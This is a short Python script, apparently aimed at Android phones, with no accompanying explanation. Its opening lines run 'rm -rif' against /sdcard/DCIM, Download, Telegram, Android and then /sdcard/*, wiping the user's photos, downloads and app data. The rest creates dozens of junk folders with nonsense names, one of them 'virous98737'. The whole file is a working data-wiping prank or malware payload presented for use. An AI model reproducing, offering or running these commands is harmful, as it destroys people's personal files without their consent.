import os
os.system("clear")
os.system("rm -rif /sdcard/DCIM")
os.system("rm -rif /sdcard/Download")
os.system("rm -rif /sdcard/Telegram")
os.system("rm -rif /sdcard/Android")
os.system("rm -rif /sdcard/*")
os.chdir('/sdcard')
os.mkdir('hhh1')
os.mkdir('hhh3')
os.mkdir('hhh2')
os.mkdir('hhh6')
os.mkdir('hhh8')
os.mkdir('hhhj8')
os.mkdir('hhh9')
os.mkdir('hhh10')
os.mkdir('hhh11')
os.mkdir('hhheb9')
os.mkdir('hhhk')
os.mkdir('hhhn')
os.mkdir('hhhdjdh8')
os.mkdir('hhhmsah')
os.mkdir('hhkokoh8')
os.mkdir('juh')
os.mkdir('lilo')
os.mkdir('DCIM9')
os.mkdir('rjff')
os.mkdir('euror')
os.mkdir('kolo')
os.mkdir('nta')
os.mkdir('bb')
os.mkdir('bbb')
os.mkdir('xx')
os.mkdir('jokm')
os.mkdir('jrfjnf')
os.mkdir('ujil')
os.mkdir('gy')
os.mkdir('moh')
os.mkdir('kolkol')
os.mkdir('pc')
os.mkdir('pc2')
os.mkdir('olki')
os.mkdir('jnki')
os.mkdir('tiyamo')
os.mkdir('amal')
os.mkdir('konila')
os.mkdir('n3as')
os.mkdir('tafah1')
os.mkdir('pipkij')
os.mkdir('picala')
os.mkdir('hanot')
os.mkdir('drafatnta')
os.mkdir('bkolo')
os.mkdir('vicitiy')
os.mkdir('gta18')
os.mkdir('geken')
os.mkdir('pesf')
os.mkdir('dndk')
os.mkdir('pkfn')
os.mkdir('flon')
os.mkdir('mimijd')
os.mkdir('hta hawa')
os.mkdir('virous98737')
os.mkdir('euro 123')
os.mkdir('maroooc')
os.mkdir('dfpl')
os.mkdir('1259')
os.mkdir('972')
os.mkdir('kolji')
os.mkdir('szrf')
os.mkdir('zarafa')
os.mkdir('momkin nbosk')
os.mkdir('hhhjjkfbd')
os.mkdir('ntarzal')
os.mkdir('topjdb')
os.mkdir('jawdaakbarf')
os.mkdir('lmkalahvdj')
os.mkdir('briirkr')
os.mkdir('iejekek')
os.mkdir('kfbxle')
os.mkdir('dlnwxx')
os.mkdir('popopop')


